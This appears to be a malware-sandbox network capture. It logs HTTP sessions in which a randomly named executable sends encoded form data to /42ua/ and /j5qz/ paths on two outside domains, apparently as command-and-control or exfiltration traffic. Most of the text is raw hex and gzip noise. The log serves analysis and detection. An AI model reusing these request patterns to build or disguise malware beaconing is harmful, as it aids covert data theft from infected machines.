66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.4497743.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:11.888911009 CEST720OUTPOST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4d 72 66 35 69 57 65 68 77 68 4f 4e 6b 37 33 50 6d 52 55 39 6b 56 37 63 79 56 6d 67 75 33 4f 47 69 41 70 4f 49 57 4d 43 2b 4b 64 68 74 6b 74 70 73 76 56 33 34 74 58 5a 5a 78 5a 50 78 62 4c 45 30 7a 41 64 77 6a 64 37 68 78 68 38 52 70 6a 32 33 4d 4c 56 30 68 51 68 44 36 4d 7a 50 79 35 58 58 46 33 66 32 4b 35 68 4f 35 36 32 46 4e 67 73 2f 68 50 38 39 79 41 36 38 39 4a 68 4b 5a 74 4b 4b 49 58 62 36 69 6e 79 6e 49 72 57 36 55 6b 45 73 43 46 37 47 6e 77 58 56 71 6a 73 6f 2b 50 67 6f 6c 2f 4a 55 30 50 7a 31 66 4f 4b 51 78 4d 36 57 33 61 64 50 41 3d 3d
                                                          Data Ascii: TvpPfhGp=34SgftVPj7MgMrf5iWehwhONk73PmRU9kV7cyVmgu3OGiApOIWMC+KdhtktpsvV34tXZZxZPxbLE0zAdwjd7hxh8Rpj23MLV0hQhD6MzPy5XXF3f2K5hO562FNgs/hP89yA689JhKZtKKIXb6inynIrW6UkEsCF7GnwXVqjso+Pgol/JU0Pz1fOKQxM6W3adPA==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.4497753.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:14.556703091 CEST740OUTPOST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4b 37 76 35 6b 78 43 68 33 42 4f 4d 6f 62 33 50 73 78 55 35 6b 56 33 63 79 56 50 34 75 6c 71 47 68 68 5a 4f 4a 58 4d 43 39 4b 64 68 6a 45 74 31 6a 50 56 43 34 74 4b 73 5a 77 6c 50 78 62 66 45 30 79 77 64 77 77 31 36 68 68 68 69 49 35 6a 77 39 73 4c 56 30 68 51 68 44 2b 6b 4e 50 78 4a 58 58 31 48 66 33 76 56 67 48 5a 36 31 43 4e 67 73 74 52 50 77 39 79 41 49 38 35 6f 45 4b 62 46 4b 4b 49 6e 62 36 33 4c 31 6f 49 72 51 2b 55 6b 52 70 68 70 32 47 6e 68 59 56 4b 7a 78 71 4e 48 66 74 6a 75 54 46 46 75 6b 6e 66 71 35 4e 32 46 4f 62 30 6e 55 55 4d 62 2f 67 55 65 46 62 53 36 4b 45 61 6e 44 72 64 62 55 32 78 49 3d
                                                          Data Ascii: TvpPfhGp=34SgftVPj7MgK7v5kxCh3BOMob3PsxU5kV3cyVP4ulqGhhZOJXMC9KdhjEt1jPVC4tKsZwlPxbfE0ywdww16hhhiI5jw9sLV0hQhD+kNPxJXX1Hf3vVgHZ61CNgstRPw9yAI85oEKbFKKInb63L1oIrQ+UkRphp2GnhYVKzxqNHftjuTFFuknfq5N2FOb0nUUMb/gUeFbS6KEanDrdbU2xI=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.4497763.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:17.155595064 CEST10822OUTPOST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4b 37 76 35 6b 78 43 68 33 42 4f 4d 6f 62 33 50 73 78 55 35 6b 56 33 63 79 56 50 34 75 6c 69 47 68 54 52 4f 49 30 30 43 38 4b 64 68 72 6b 74 32 6a 50 56 62 34 74 53 6f 5a 77 70 31 78 59 6e 45 79 51 49 64 6c 78 31 36 76 68 68 69 56 70 6a 31 33 4d 4c 36 30 6c 30 62 44 36 34 4e 50 78 4a 58 58 33 76 66 6a 4b 35 67 4c 35 36 32 46 4e 67 65 2f 68 50 63 39 79 59 79 38 35 74 78 4b 4c 6c 4b 4e 73 44 62 2f 42 66 31 33 34 72 53 35 55 6c 55 70 68 6b 32 47 6d 4e 36 56 4a 76 4c 71 4b 48 66 74 69 44 66 51 52 7a 7a 6c 73 43 32 52 78 78 58 5a 6c 48 4b 55 75 44 2b 78 30 75 44 48 32 37 6e 46 72 66 54 2f 75 44 56 68 46 4d 6e 57 63 54 58 56 79 46 56 56 77 53 49 35 63 46 32 46 55 2b 2b 74 50 41 36 77 64 45 6b 73 2f 73 65 53 32 73 5a 67 4f 55 58 6a 45 48 75 2f 6f 64 7a 63 43 35 63 53 31 51 4b 76 75 39 6b 30 66 69 49 35 70 33 72 61 47 56 4e 73 4f 42 55 6d 71 74 4f 2f 78 65 74 77 30 69 78 44 78 6e 74 4e 42 4a 41 53 68 76 62 61 34 4b 69 77 32 4a 4c 69 6a 54 68 4e [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=34SgftVPj7MgK7v5kxCh3BOMob3PsxU5kV3cyVP4uliGhTROI00C8Kdhrkt2jPVb4tSoZwp1xYnEyQIdlx16vhhiVpj13ML60l0bD64NPxJXX3vfjK5gL562FNge/hPc9yYy85txKLlKNsDb/Bf134rS5UlUphk2GmN6VJvLqKHftiDfQRzzlsC2RxxXZlHKUuD+x0uDH27nFrfT/uDVhFMnWcTXVyFVVwSI5cF2FU++tPA6wdEks/seS2sZgOUXjEHu/odzcC5cS1QKvu9k0fiI5p3raGVNsOBUmqtO/xetw0ixDxntNBJAShvba4Kiw2JLijThNGiw/4yEM6ZHaXKU+JdXk5tf800i7phaf/GrVOQpyBZXm81S21EzkkfODSgV+vRnsyPHc71/7gsfxCWrO5xROsd0fqoMtmP1OAzNKVLd3K8qn2SGJtgleGe4bc2nvNPmRflYI2m2J/47RURJHErmNUgY0CPIscjXkJfxctEEpLl+8wmkLQ8M8O5wPZNVNO21dw+lo7eLmgLMVn9dtTZ45baxVU2iVJUDlz1cYQh6kk1gbl5JulJ5dJemUza6mhisDAsKtIPO591nTCeVYvO0vLRPAWaa0W2cx3ud9F40bPEUWawgk/YucTQqsXK1aTCE0PdPA6U+3gc/zC2eLIGT2WySBHsm/91KaVEbRjG/uUmbhyL4Us/8LJkC/HaIIfRl8scNtLTIaEqY57g/ZEKTj1ZYwhLFdE3RYqMMJCxrvv8JYcYXSiK4WI/D3B/PHmI+lzBUdsGfaoBw7NQc8QiXnY6b0EikR9xG7r17OnM0LQBFjOvpbcjcCiK+wFOpvmLNOEtK8kKKLoYGtrkqsE2Ka5XZXp2f0ajVWAbfCschjbxzAqnJYhVu0w/F1L5W78+gTnoVePteid6vHWGq4mFzGd9l8CPAzDo9h+PAQ9GsJVd7egKxLDDCU/IReFzOJcI/rbJ8MH+g+iXXMuo1TOkXIQElsIDeyYQCDS6 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.4497773.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:19.703322887 CEST459OUTGET /42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:20.161262035 CEST400INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Wed, 03 Jul 2024 13:59:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 260
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 54 76 70 50 66 68 47 70 3d 36 36 36 41 63 5a 74 30 76 71 55 53 63 72 6d 69 74 47 6d 6f 30 53 6e 37 69 6f 6e 6e 73 33 4d 62 6c 6c 71 2b 75 45 47 6e 37 6e 58 78 36 41 52 42 41 55 49 4e 39 74 64 52 69 6b 34 53 6f 73 42 33 73 64 32 59 4f 69 38 57 36 4b 75 43 69 69 31 50 76 51 68 7a 2b 56 46 65 58 66 33 71 6c 4e 66 35 73 44 38 42 4c 49 73 4d 4b 43 70 54 65 53 76 47 77 49 34 35 48 4c 4d 3d 26 59 36 36 34 47 3d 53 74 74 44 65 6e 39 38 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.449778162.241.2.92801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:25.505705118 CEST738OUTPOST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 39 42 39 42 70 55 72 70 63 6f 69 36 6d 4f 75 64 2f 55 6c 54 78 2f 51 31 6e 59 62 4a 46 7a 57 7a 6d 61 46 39 47 4a 62 50 34 44 58 58 35 35 63 44 30 70 50 6b 39 35 43 55 34 6a 4d 65 72 76 48 78 67 34 51 79 36 52 38 2f 55 6f 75 62 31 4c 75 42 77 45 71 2f 43 54 48 68 77 58 6c 5a 31 6f 77 5a 78 63 45 42 72 34 76 4a 4a 53 45 78 37 6a 31 52 79 33 6b 2b 67 56 64 4d 31 35 74 63 36 4a 43 38 74 52 4c 36 58 72 62 72 4b 39 77 63 35 78 43 39 6c 6f 68 73 43 2f 56 45 4f 30 73 5a 50 61 4d 50 34 33 2b 78 4f 52 47 52 61 32 52 5a 66 6f 79 46 2b 32 7a 42 6b 6f 37 37 39 35 4c 6e 36 72 54 32 50 41 3d 3d
                                                          Data Ascii: TvpPfhGp=9B9BpUrpcoi6mOud/UlTx/Q1nYbJFzWzmaF9GJbP4DXX55cD0pPk95CU4jMervHxg4Qy6R8/Uoub1LuBwEq/CTHhwXlZ1owZxcEBr4vJJSEx7j1Ry3k+gVdM15tc6JC8tRL6XrbrK9wc5xC9lohsC/VEO0sZPaMP43+xORGRa2RZfoyF+2zBko7795Ln6rT2PA==
                                                          Jul 3, 2024 15:59:26.271322966 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:25 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 [TRUNCATED]
                                                          Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3I (tIX(DWP0goz|9u?Br|pQrN<)(b3HeuUIF15NL9UX]*w$c[Ga-q.aKOnLQFhL216+P\Zgx[2&Z,ZKf-m_j/nvQK;luZ_/Zw[b@oK@<M`QCE,BE2[2;`73h[kS",Y4A|>{=UwYMXL!i0ZITyg6't"K`FAFkd?LkjYp?u7'&k4Q(:G\4.wN-]wrB~Kc9E"wvtcbiONbpQM05G
                                                          Jul 3, 2024 15:59:26.271352053 CEST1236INData Raw: 18 8f c7 e6 67 f7 eb 7d 63 23 70 be 12 d8 ce 84 97 1f b3 23 74 54 6d 22 59 5c 0b 96 85 1e a6 f6 4b ce af fa 11 7e 4f 26 fd 5f f2 09 74 26 bf e4 bd 4e 87 e3 f7 05 bb 2c 23 b5 a3 69 e1 4e 5a e3 77 af bb c1 eb 5d 58 3e 61 5b e7 7e 6d ff a9 04 d9 4a
                                                          Data Ascii: g}c#p#tTm"Y\K~O&_t&N,#iNZw]X>a[~mJh|}f..p{" `XX`kRzknXxO%BwjSfra"g'C&E:> 'D(*S~db#.Zw:DRP^+
                                                          Jul 3, 2024 15:59:26.271365881 CEST1236INData Raw: 4f fa 30 74 8c b4 b2 63 a8 c5 63 b5 7d 1e 81 cd 58 8c f3 0b eb 8e 41 2b 36 15 31 73 42 2b d2 3a ac 5a 14 b2 52 1c 2a b5 c1 94 99 3a dd 2a a0 e8 48 9d 2f a5 6f 0a 25 9c 60 b2 31 0a 59 74 1b 17 22 d3 1d 01 46 2b 13 4f 24 dc 8d fc 17 e5 c2 40 e4 a1
                                                          Data Ascii: O0tcc}XA+61sB+:ZR*:*H/o%`1Yt"F+O$@b36EhlCnC%uGB,"bw-X(*6tyD2`EmoTBnf|$.IyNIqin+anFm&H 28"{
                                                          Jul 3, 2024 15:59:26.271436930 CEST1236INData Raw: 99 61 2a 02 34 26 1a 87 c9 d1 56 48 69 05 a3 c3 21 df 0e fc bf 92 5e 6c f4 2c e8 8e b6 1d d0 59 dd 4c b9 cb ad 85 f4 0d ee 60 a5 cf 15 2e a7 90 9b 43 a4 0d 73 42 ab 20 57 16 dc 6b 91 66 da 38 a6 dc 01 ff 63 bb a0 5a c9 39 39 6a d0 82 aa 4d 8c 50
                                                          Data Ascii: a*4&VHi!^l,YL`.CsB Wkf8cZ99jMPzk?3#)|L.6oQ#-i|r=Km4l9^iynY/9dVB~<_OvXNHN9#>.H=6La%/_uKlp(e&*1E
                                                          Jul 3, 2024 15:59:26.271450043 CEST896INData Raw: 3f 53 6a e2 30 e8 34 bb bd 41 b3 7b 75 71 2c 8b 33 73 0b 86 76 3b 1e ee 22 64 dd 47 13 d7 c0 9d cb 66 f7 e2 b1 fc 5e 01 3c 64 57 97 8f 26 ae 80 df 22 76 7f b8 9d 5e 5a 84 16 5b a5 13 1d e5 36 e8 65 77 65 46 a9 9e 9d ab c8 fb be 14 e6 92 75 3a 7c
                                                          Data Ascii: ?Sj04A{uq,3sv;"dGf^<dW&"v^Z[6eweFu:|rf_}.(o/S'bj;U}h,VTAfw-+G9Qn,P8nGTi2t/VW%%y)H+ah8q46lN7.]7pwu2@=<Nj
                                                          Jul 3, 2024 15:59:26.271465063 CEST1236INData Raw: 1f 3a b1 ba f0 ef 7e 7d 19 3c 11 21 d4 ce e9 74 1f 62 19 3d 11 c3 4b bf 8f 50 c4 4e ac 2f a4 fe f5 39 ca ed 55 3e 59 b9 bd fa e7 28 b7 07 f1 0c e5 f6 10 1e 54 4e a4 f1 cf 91 64 d6 7e 3e 9e 65 54 a4 2c 06 8a a5 4b bb 17 6e 4d d9 5d 09 e9 fd fa db
                                                          Data Ascii: :~}<!tb=KPN/9U>Y(TNd~>eT,KnM]eD"e&*BeaipB+$ ycA)a<.Bf&OO&\0e~$dw#620I}Cs/E7gR[b@M9||&*'utkiD04$&,h8 "M
                                                          Jul 3, 2024 15:59:26.271478891 CEST1236INData Raw: e8 65 c1 aa f0 08 76 af c0 ee b7 7a 97 c7 c0 27 2c 15 72 4e 69 a8 f9 3c 20 b5 3f 2a 07 a6 d6 24 96 29 4b 2d 18 31 79 a8 28 01 dc b1 8a 03 f2 35 33 5c 3f 94 69 e7 d6 41 4a 37 b0 01 a1 2c cb 24 2c 5f 9a e4 2b f4 cd ed f7 2c 7a 57 dc bf c3 e2 26 61
                                                          Data Ascii: evz',rNi< ?*$)K-1y(53\?iAJ7,$,_+,zW&aSPwRXE$ D0#{)H$s&1mD&Os$G=c 9y~!`Zq[0S!O"K3NjoXMN&2Hbx/Rm?yj7X+H
                                                          Jul 3, 2024 15:59:26.271492004 CEST1236INData Raw: 2b c0 78 01 4f e8 13 24 7a 0a 66 71 80 a1 b4 2f 4f ba 4d 92 f4 f0 af 8f 7f 03 fc 1b e2 df c5 13 b8 3d c5 4c 09 30 af 60 e3 51 33 f4 3c b1 c5 a9 ae bb bb a3 92 99 18 1a fb 30 dd 21 e2 f4 4e c7 59 c1 dc 27 fd 93 8b d6 25 83 ed 92 48 b2 34 ab 23 03
                                                          Data Ascii: +xO$zfq/OM=L0`Q3<0!NY'%H4#iRw3BI@|OOnyQsqrMXr&Pvy],Fmj}o}2Lp3z2d<)TF*#n.1_i]]1MNq3cFTU;
                                                          Jul 3, 2024 15:59:26.271711111 CEST1236INData Raw: 1d 01 2e fb 53 da 6c 60 2a 7a 80 f4 8b 14 91 cf b7 f6 93 fa ec 42 55 f4 4a 05 57 2b 1f 3f bb cb 0a a4 02 7f 9d d4 fd a4 0e 1b 98 87 7a f4 5e a6 47 ef a1 1e fd 97 e9 d1 7f a8 c7 e0 65 7a 0c 1e ea 31 7c 99 1e c3 87 7a 5c bc 4c 8f 8b 87 7a 5c be 4c
                                                          Data Ascii: .Sl`*zBUJW+?z^Gez1|z\Lz\Lz\Lz}oLn.}K*II'tHgXU=8'G59_l(Lg.4Rj31yvHg-,nbS3'*g
                                                          Jul 3, 2024 15:59:26.271724939 CEST328INData Raw: d6 3f 39 f1 9f a2 4b b7 73 52 d2 3f 87 5b f7 a4 a4 ff 8c ad 0d 4e 4e fc e7 28 d3 3b 29 e9 9f c3 ad ca f1 87 49 9f b8 b5 03 c0 aa 8d 1d 26 2d 3e e4 d6 89 c9 bc c8 04 e5 02 af 05 d0 10 dc 0c e0 49 63 97 7c ed 36 fa 69 59 e5 e0 33 83 ab 51 da ff 94
                                                          Data Ascii: ?9KsR?[NN(;)I&->Ic|6iY3Q !EBWWUvE.xuU{IX0K@]}sZ5M8-8f]ctvn.%$:C&joEFPT(=9;{~j8;G*-"z5w1D(d
                                                          Jul 3, 2024 15:59:26.276340961 CEST1236INData Raw: 72 bb d4 82 45 b7 de 95 8a 97 cb 08 c8 1b 00 d8 12 86 e5 4e ef 33 da 92 44 69 b5 cc 5e 56 0f 06 83 e2 ce 85 c5 55 cd 03 52 6c ae 08 4d 70 cd d4 8a 8f 80 c3 40 ba 23 a1 ef 52 04 24 4c f0 3a 5c ce 5a ac 76 95 53 4e bb ab 61 17 33 49 af 8f 5f dd c1
                                                          Data Ascii: rEN3Di^VURlMp@#R$L:\ZvSNa3I_OH9YzGt;O##2G,h8 "v&sHm]6E(MT}^y.`)h6s!y;wBM>V55A?h[hm:~ SxCe9!


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.449779162.241.2.92801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:28.035813093 CEST758OUTPOST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 39 42 39 42 70 55 72 70 63 6f 69 36 6e 74 32 64 38 31 6c 54 39 50 52 48 72 34 62 4a 4f 54 57 33 6d 61 42 39 47 4e 72 6c 34 32 50 58 35 62 30 44 31 6f 50 6b 7a 5a 43 55 7a 44 4e 56 32 66 48 71 67 35 73 36 36 52 77 2f 55 73 47 62 31 4c 65 42 78 33 79 38 44 44 48 6a 32 58 6c 62 78 6f 77 5a 78 63 45 42 72 34 72 76 4a 53 63 78 36 53 46 52 6a 6d 6b 35 70 31 64 50 79 35 74 63 2b 4a 43 34 74 52 4c 49 58 71 57 2b 4b 2f 59 63 35 78 79 39 6c 39 64 76 4e 2f 56 43 54 6b 73 4f 47 36 4a 31 67 58 6e 42 46 79 6d 69 45 6d 56 35 58 4f 6a 66 76 48 53 57 32 6f 66 49 67 2b 43 54 33 6f 75 2f 55 49 63 35 57 43 54 33 58 4d 65 54 41 79 65 61 73 30 33 65 68 45 73 3d
                                                          Data Ascii: TvpPfhGp=9B9BpUrpcoi6nt2d81lT9PRHr4bJOTW3maB9GNrl42PX5b0D1oPkzZCUzDNV2fHqg5s66Rw/UsGb1LeBx3y8DDHj2XlbxowZxcEBr4rvJScx6SFRjmk5p1dPy5tc+JC4tRLIXqW+K/Yc5xy9l9dvN/VCTksOG6J1gXnBFymiEmV5XOjfvHSW2ofIg+CT3ou/UIc5WCT3XMeTAyeas03ehEs=
                                                          Jul 3, 2024 15:59:28.960494041 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:28 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8
